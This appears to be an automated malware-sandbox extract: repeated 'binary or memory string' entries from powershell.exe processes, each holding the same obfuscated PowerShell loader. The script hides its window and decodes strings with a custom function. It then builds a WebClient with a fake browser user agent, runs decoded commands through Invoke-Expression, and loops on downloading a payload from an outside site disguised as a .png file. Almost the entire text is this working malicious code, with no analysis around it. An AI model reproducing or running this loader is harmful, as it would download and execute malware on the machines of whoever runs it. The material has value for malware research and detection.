($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBa
Source: powershell.exe, 00000005.00000002.2205456986.0000000008430000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG
Source: powershell.exe, 00000002.00000002.2485251498.0000020B74913000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2357862558.0000020B5A9B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361180627.0000020B5C460000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197275382.0000000004690000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ,o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt
Source: powershell.exe, 00000005.00000002.2196688153.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196941349.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197275382.0000000004690000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exeIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT i
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ure) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indband
Source: powershell.exe, 00000005.00000002.2196688153.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msilIndbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' 